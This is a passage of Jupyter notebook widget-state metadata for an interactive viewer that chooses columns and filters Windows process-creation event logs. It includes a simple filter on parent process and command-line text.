"75aaf991c6b74e658fa302082b2b9ccb": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "7605ec55db4647adb49f7b24b15c8f31": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "7634458fadea4febba04fb37f6a2b441": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "765363db870c4e5fbc4aee6d8fa11a6e": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "77aeec9a3f0b4bf99eefad77b1f68dec": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_202bb3e71e2f4283a216400f17f82edc", "IPY_MODEL_88d39abbcbe545f9bec07b67ecb929fc" ], "layout": "IPY_MODEL_b1ac544d401348f79719d22c32c26a1d" } }, "77e028053b3f49799406ea9d7cb56953": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "Account", "CommandLine", "Computer", "EventID", "NewProcessName", "ParentProcessName", "TimeGenerated" ], "description": "Selected: ", "index": [], "layout": "IPY_MODEL_e66cc5687c9b491c82606ce504ad107c", "rows": 5, "style": "IPY_MODEL_d6aa34a7358d41baa5b43fd1af3699dd" } }, "791184a6b4e94f2897f8d7fa4f84d4a9": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "7af569788ca7405883d02f1967fa0ecd": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "7c0d2a8d8afe4197af41c37b702ea1f4": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Delete filter", "layout": "IPY_MODEL_9f6748ce9fe141aca528ace24ba67cf7", "style": "IPY_MODEL_199b9d5bf65c4041ab9d98dc20746b07" } }, "7ccb5b87754d479eb5e582d0342cc09c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Apply filter", "layout": "IPY_MODEL_8a8c268c50274003b74105b6afe899f0", "style": "IPY_MODEL_23a39ea52cdd48278e671f3d57a160cc" } }, "7faa7b2636ff49c081e8d4ceb6f0d5dc": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "8152896ed99a4cc6b948ea9e1cf1d5b1": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "822a4e905a5c44f8897cac7be18a6a66": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "825dae91b7d944c18fed6802e8b4d2d8": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "CheckboxModel", "state": { "description": "not", "disabled": false, "layout": "IPY_MODEL_aa02500b929b4d7180ec69a7cf20d591", "style": "IPY_MODEL_848a1c3206864cf584b7757ef5ed5cd4", "value": false } }, "830597ddd37d413aa19ce107456ec8e3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DropdownModel", "state": { "_options_labels": [ "TenantId", "Account", "EventID", "TimeGenerated", "Computer", "SubjectUserSid", "SubjectUserName", "SubjectDomainName", "SubjectLogonId", "NewProcessId", "NewProcessName", "TokenElevationType", "ProcessId", "CommandLine", "ParentProcessName", "TargetLogonId", "SourceComputerId", "TimeCreatedUtc" ], "index": 2, "layout": "IPY_MODEL_b64198dc7a1d416b92e576c5ee7c2fd1", "style": "IPY_MODEL_0dbc6f3f4b5c4b5bb4cd2158eac7abcc" } }, "8450c56dd9974440a252629859e30d02": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "848a1c3206864cf584b7757ef5ed5cd4": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "84a9aec138164093a2e6067cd11155d1": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add ⇾", "layout": "IPY_MODEL_9c9fcc10bd104f4393f868e08dd758f5", "style": "IPY_MODEL_23b18ed0935441fbad438828933dccc2" } }, "853b539b4a84472694072df83fc030af": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "Account", "CommandLine", "Computer", "EventID", "NewProcessName", "ParentProcessName", "TimeGenerated" ], "description": "Selected: ", "index": [], "layout": "IPY_MODEL_f54de8691386447697961c9c868f9a29", "rows": 5, "style": "IPY_MODEL_0a721017793d455a820c6aeaf902ff33" } }, "85b9e3ef6fbe424aa297286fc8ff7b4d": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "500px" } }, "8603589afd034ef18837d15a44717d2a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "Filter value", "layout": "IPY_MODEL_2400b101ec914497b73951fbe1c94fad", "style": "IPY_MODEL_7605ec55db4647adb49f7b24b15c8f31", "value": "cmd" } }, "862dbc1d217e4445b93a96a17792661c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_ba1fe5d2378e441fb5560721c2ad905d", "IPY_MODEL_a538297768214e9882732aa71ff00b2a", "IPY_MODEL_05819ecfa0a84cb6bc1da256ad6b2806", "IPY_MODEL_a49736614c4842248677b03304d4b3c0" ], "layout": "IPY_MODEL_d441f974166b4f72a2bafa678cbbded4" } }, "86cd6f31f32949a6adc24e7e36fae932": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add ⇾", "layout": "IPY_MODEL_e98ae86d25c84795a7adb7946fde3294", "style": "IPY_MODEL_74c7f4c498954e67a0eee60214170b96" } }, "870b77088ecd4f34b282b3999a797551": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "876360ec6f7a40f29e2ddddb7499edfa": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "87a6fc1ffe7b41be9d94f49f0897ca1e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_af35fa80fed04119bfab11dfaceb30e5", "style": "IPY_MODEL_2356f1cfb7f14639aa485a76c074a82b", "value": " in " } }, "883e0693211d44a7ad0cce63566515de": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add ⇾", "layout": "IPY_MODEL_e065ea541e08420c837b946865eb02cd", "style": "IPY_MODEL_66ae56d26ca74fb4ad7ee2d96fe02815" } }, "88ac2326de314e9fb81828f0a49ab21e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "88d39abbcbe545f9bec07b67ecb929fc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_20dbae8cc26a401b99329ae9f19bfbef", "IPY_MODEL_007afbb0564c460386581a0c37f92acc" ], "layout": "IPY_MODEL_67f4128b4e4e45a7991b0d4bf23a9b2a" } }, "88d5c49ce3144a1d90912d1b4e0e8f35": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "89cc2910803348458afee283b5741518": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "8a67fdf00af641aa8236734e0e0b35e1": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "99%" } }, "8a8c268c50274003b74105b6afe899f0": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "8c75af75e9ff4248b52541ab1a1b21fe": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "8ce0e47b9a7a4fe1a02502625c611010": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "8d41729e1a0044b5bdfd0914a98a1665": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "8ec127f5d9d74f068c9ce0043bc6f7c6": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "8f2dabeba3214a06916d46d79a842633": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "8f774e952712457980e7629729a12dd6": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "8f89a185ca434b478f868052fbcf355b": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "400px" } }, "9062d54a43f14eff95ada0765412d70c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DropdownModel", "state": { "_options_labels": [ "TenantId", "Account", "EventID", "TimeGenerated", "Computer", "SubjectUserSid", "SubjectUserName", "SubjectDomainName", "SubjectLogonId", "NewProcessId", "NewProcessName", "TokenElevationType", "ProcessId", "CommandLine", "ParentProcessName", "TargetLogonId", "SourceComputerId", "TimeCreatedUtc" ], "index": 0, "layout": "IPY_MODEL_35ed7a6a2aae4f8bb322a916730e04d5", "style": "IPY_MODEL_28e2f8aecc1a42f6b2be8c80e32b5450" } }, "9171d21e033246759ada6b96efad2770": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Update filter", "layout": "IPY_MODEL_240c8efe2304410fbf00fab36dacaa92", "style": "IPY_MODEL_11bad756849940df861619ee57f54ae8" } }, "91c4521dd87b4611b0327231aeb56283": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Add filter", "layout": "IPY_MODEL_a190c47ab76d4e8095aca04aade6e5b9", "style": "IPY_MODEL_28d31e801c624bac96c38ebdc8bde877" } }, "91f88d6ddbd149f4911b712252262582": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "924757853d714e4d9379bf5ea0401e62": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Apply filter", "layout": "IPY_MODEL_9ff12de9bb254724947e57bcac8aacbe", "style": "IPY_MODEL_6ec04674a0df4341a4b6a4304b7d9a43" } }, "926d144e06b24698bb51b8c51f18ac27": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "92d6d1021cab4afc82932377c5826a57": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "9414237db4a44f64833c7e9743a5d522": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "CheckboxModel", "state": { "description": "not", "disabled": false, "layout": "IPY_MODEL_babe30d69e034ef0af9907430bf4c716", "style": "IPY_MODEL_66d7edd125c144388025e41cab4aa0ac", "value": false } }, "9578b90f719547f0b4c11b238202c9cc": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "95b2e82b11184bc9abb7d59331f60b18": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "95c7078cbbc14e81800c9beaca07ab61": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "LabelModel", "state": { "layout": "IPY_MODEL_dcc07290f17244e1b2f7167f2ec5b403", "style": "IPY_MODEL_317f3cbab9a04ec4ba020f7d842c08ff", "value": "Current filters" } }, "95d79867267445e1810542e2538a7a89": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "97a4e6e8b84e4da4b43cf9888aad5c47": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "983445971b1748fa8e34c852d9c0ff1e": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "99c0dafd7b9d497bb9f1fd7395417065": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "99e3ed316f0c4801bbebdbcd7e5e9eea": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Update filter", "layout": "IPY_MODEL_95b2e82b11184bc9abb7d59331f60b18", "style": "IPY_MODEL_9f7cda5fec354ecc96e07b837f7386c9" } }, "99ed9f340e444401a3934a1451bb3171": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_7c0d2a8d8afe4197af41c37b702ea1f4", "IPY_MODEL_0b1aad3a831b4a57ab9463d831a3c630" ], "layout": "IPY_MODEL_0b5205cdc4a14e4bba53cd6c04d3bf17" } }, "9a8a82586b6e41ab87cce717b8330065": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "9ac351b5363b475496c518e770afbce3": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "9b49bd4fde5f4b15a5b42e1b3c69f462": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "border": "solid gray 1px", "margin": "1pt", "padding": "5pt", "width": "80%" } }, "9c4d084fb7a74bb3bc7fdf8dccc7e7d1": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "9c9fcc10bd104f4393f868e08dd758f5": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "9d1e3519a8aa40f8afc5253b143f1cfc": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_3e5bf9dfbc5e403fbc1f598a84461202", "IPY_MODEL_c8070c6701244ca0bbc0bdfd2c8277c5" ], "layout": "IPY_MODEL_123640ba0cea4f9da968315244f625be" } }, "9d5c7d739a3a469a85328effd2798798": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "9d64ba523a704ed49b41651fde3f2148": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_0c442da2b2b94765ba2116badd5ed9a3", "IPY_MODEL_04ff5b81dc504d3b98f6e052da918363" ], "layout": "IPY_MODEL_1754cc6735a642c99c80ea50b3f23387" } }, "9dff4a1c556a4a0483e3f1be59d6abd1": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_dafe89f0ccf54e93a4e27e79cdbbb91d", "IPY_MODEL_c50401bf861d45169f598225e2d9eb95" ], "layout": "IPY_MODEL_b07f713cf9b54136a67d0dffa7578108" } }, "9f6748ce9fe141aca528ace24ba67cf7": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "9f7cda5fec354ecc96e07b837f7386c9": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "9f7ea662245444379365dcd2ba059448": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "9ff12de9bb254724947e57bcac8aacbe": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a190c47ab76d4e8095aca04aade6e5b9": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a1d3217416bd48da9476d264384ba3e9": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "a1ed7400c5e44de38efb3d26c89a560f": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a2042295c9d24d27acfc9fe059cdeaa2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_0f78cf60c57442c7962936dc5129fb1f", "IPY_MODEL_49ec7cbca6094ec6bd95b9d8fc475e19" ], "layout": "IPY_MODEL_8ec127f5d9d74f068c9ce0043bc6f7c6" } }, "a2111a9ba8b346f9a740669cf247d8e2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_5dc40bae85f843089ee9cd9c23ba55a1", "IPY_MODEL_d0c335b6bcab46379fda2071644ecc0b" ], "layout": "IPY_MODEL_a98d3278641141ba87cb427ed9696a69" } }, "a4020984642c425391bd29b2819271f2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "AccordionModel", "state": { "_titles": { "0": "Choose columns", "1": "Filter data" }, "children": [ "IPY_MODEL_e13ff8b78c1a4f1a86cf3efd44926cce", "IPY_MODEL_1f53b3b0af94423f8d1e6e651d13a739" ], "layout": "IPY_MODEL_5d1d50dcb2994f94b1f68091db52194b" } }, "a453fb04433d445c8a906b6b5b86093f": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a46f22e56f3844f2aef67775f82bf700": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a479941a224240568cf7ab9faac9bcaa": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a49736614c4842248677b03304d4b3c0": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Apply filter", "layout": "IPY_MODEL_8f2dabeba3214a06916d46d79a842633", "style": "IPY_MODEL_a1d3217416bd48da9476d264384ba3e9" } }, "a49ece9f71ee4341876903064f3561ee": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "a4db3fb217db4ee099ade4ec11dc5f91": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "a538297768214e9882732aa71ff00b2a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_4732461066364353bdec58f67246ac2b", "IPY_MODEL_9171d21e033246759ada6b96efad2770" ], "layout": "IPY_MODEL_d623624498624e0c811372505b9ea306" } }, "a5ac138657f44d96b86f90336f041a1e": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a5cb991221db44d1986972f4758bd486": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Clear all filters", "layout": "IPY_MODEL_876360ec6f7a40f29e2ddddb7499edfa", "style": "IPY_MODEL_df18f2d18ec343158193cebc8f77b2ca" } }, "a67b7cf6035d467184274b9aa4ccfea2": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "AccordionModel", "state": { "_titles": { "0": "Choose columns", "1": "Filter data" }, "children": [ "IPY_MODEL_67fe3434a66d4846b4aa6f8e77545022", "IPY_MODEL_3d5cd18b3c704bd5af5b7d7e5fe8c8ef" ], "layout": "IPY_MODEL_35e743cbf37540cf82454eff5130d346", "selected_index": null } }, "a7dcffbaa4414c7fa5e011de31701511": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "a9093fa6558d4ded9d1dbd81d012564d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_196f6de2919a488d885de432efd68bff", "IPY_MODEL_2045bb0b47b740679b00453bbb43fe43" ], "layout": "IPY_MODEL_3b625d23c1724ba9ad2fca444ae41557" } }, "a98d3278641141ba87cb427ed9696a69": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "aa02500b929b4d7180ec69a7cf20d591": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "60px" } }, "aa538012bac8400d9af8fc9139f334e8": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_d81645b362234e3f9128e78f10c600f8", "IPY_MODEL_d738b25d84fd4c3199fe462da739f0d9", "IPY_MODEL_37423026a07c47bcab9fb40a998ce6e3", "IPY_MODEL_29818462d318453e942833765601e387" ], "layout": "IPY_MODEL_6505786c126f496188cabc0e0cc7fbd1" } }, "ab22d75a7f3b42b8a4a778225fa2fb9d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Apply columns", "layout": "IPY_MODEL_e62e7f1a080640fd90e2fb1471583396", "style": "IPY_MODEL_379a69de1e8c403a9b4245e01a504291" } }, "ac7accb7fbcd45aaa1387d8548373abd": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "ad3662e275b14795b7a09ffecdf1b070": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonModel", "state": { "description": "Clear all filters", "layout": "IPY_MODEL_15262870d1d84a4c9b31e8807e84e02e", "style": "IPY_MODEL_01ceaecf10814b35a94144766cb7ca53" } }, "ae04095cbbcb4aecae07f913cd96b8ef": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "ae90356d18304d3db37a05ffb571255c": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "af35fa80fed04119bfab11dfaceb30e5": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "af4f3a82204b425eaff3b8ae8f022c5c": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b06563bf165b41d3ad44fd83ca53cb6a": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b07f713cf9b54136a67d0dffa7578108": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b098189c53c8460e9a9666d5752d92ef": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_fc24f008595e4a16830989b86d128b23", "IPY_MODEL_41a49335edb540afb5788bafc4b12ee8" ], "layout": "IPY_MODEL_a46f22e56f3844f2aef67775f82bf700" } }, "b11eb634e0f4465baefb803f65deb815": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b19d18abf4ad4f8c82d1ad7ce752d3ec": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "Account", "CommandLine", "Computer", "EventID", "NewProcessName", "ParentProcessName", "TimeGenerated" ], "description": "Selected: ", "index": [], "layout": "IPY_MODEL_f4f60fc719914eacb9755d5f34d6e6e8", "rows": 5, "style": "IPY_MODEL_1de3a3299e984809933af7b33deca16d" } }, "b1ac544d401348f79719d22c32c26a1d": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b20c9970a8e948678ca47947e7aaf675": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b22abd90c5ea4903b6cc5d3d2a84d802": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_2226ad09a3aa41d88d09d86d778a4e33", "IPY_MODEL_e60df3b80f6746369ec6051d19a3a3b6" ], "layout": "IPY_MODEL_4da850c8e7b749f8b99cfc8a9f744214" } }, "b31376a38ee6457b89cc140165c1623f": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b331bba272ed438aa05e46dddfea7cdb": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "100px" } }, "b3910b3aa2ef40fba7b43d0cb4ab9d13": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b3b63660a07b4c618485f25aaded3a10": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "Filter value", "layout": "IPY_MODEL_18cced5f4a4e4e8c8be1b41f2dacef1c", "style": "IPY_MODEL_4d5f608bec20449094d83db8a84f208b", "value": "ParentProcessName.str.contains('cmd') and (CommandLine.str.contains('cacls') or CommandLine.str.contains('script'))" } }, "b572c2e3d2f94056b6260ceb71ad4dea": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b599739a1e6841428763723dd28c75fb": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "b620d8158c6a4be4ae42c239258a8cbe": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "400px" } }, "b64198dc7a1d416b92e576c5ee7c2fd1": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "200px" } }, "b6b48710a238432db8fbc85f95d965c8": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b880c4dfe80447058c66366612e7bd58": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "b9418b0a4b0f426e82d48c6d431c4b76": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "TextareaModel", "state": { "description": "Filter value", "layout": "IPY_MODEL_8f89a185ca434b478f868052fbcf355b", "style": "IPY_MODEL_b599739a1e6841428763723dd28c75fb" } }, "ba1fe5d2378e441fb5560721c2ad905d": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ "IPY_MODEL_c8f3d5852944446f8da439f8deb6c483", "IPY_MODEL_53edfbdbf8094668887e7fa7aca1277d" ], "layout": "IPY_MODEL_32da2808f3dc48c780007097651ad199" } }, "ba9e467fd43a4f8a9fd1945b5b733982": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "ButtonStyleModel", "state": {} }, "babe30d69e034ef0af9907430bf4c716": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": { "width": "60px" } }, "bcb693da74b04b08b12702d7192a1797": { "model_module": "@jupyter-widgets/base", "model_module_version": "1.2.0", "model_name": "LayoutModel", "state": {} }, "befe835037dc4d2c91e679f463aac44a": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "HBoxModel", "state": { "children": [ "IPY_MODEL_c0d47d4ba3094e7da48a68121f8bfbd9", "IPY_MODEL_c5fcdf8ea5884d2a88dcad5a87416fd0", "IPY_MODEL_b19d18abf4ad4f8c82d1ad7ce752d3ec" ], "layout": "IPY_MODEL_b11eb634e0f4465baefb803f65deb815" } }, "bf13fcf0577a4563999273f2becb1a40": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "" } }, "c0d47d4ba3094e7da48a68121f8bfbd9": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "SelectMultipleModel", "state": { "_options_labels": [ "Account", "CommandLine", "Computer", "EventID", "NewProcessId", "NewProcessName", "ParentProcessName", "ProcessId", "SourceComputerId", "SubjectDomainName", "SubjectLogonId", "SubjectUserName", "SubjectUserSid", "TargetLogonId", "TenantId", "TimeCreatedUtc", "TimeGenerated", "TokenElevationType" ], "description": "Source: ", "index": [], "layout": "IPY_MODEL_f4f60fc719914eacb9755d5f34d6e6e8", "rows": 5, "style": "IPY_MODEL_870b77088ecd4f34b282b3999a797551" } }, "c1e8284393ce49e1b68064a05e0821ec": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "DescriptionStyleModel", "state": { "description_width": "initial" } }, "c29e51193319449d81fadcf89b5bbfce": { "model_module": "@jupyter-widgets/controls", "model_module_version": "1.5.0", "model_name": "VBoxModel", "state": { "children": [ 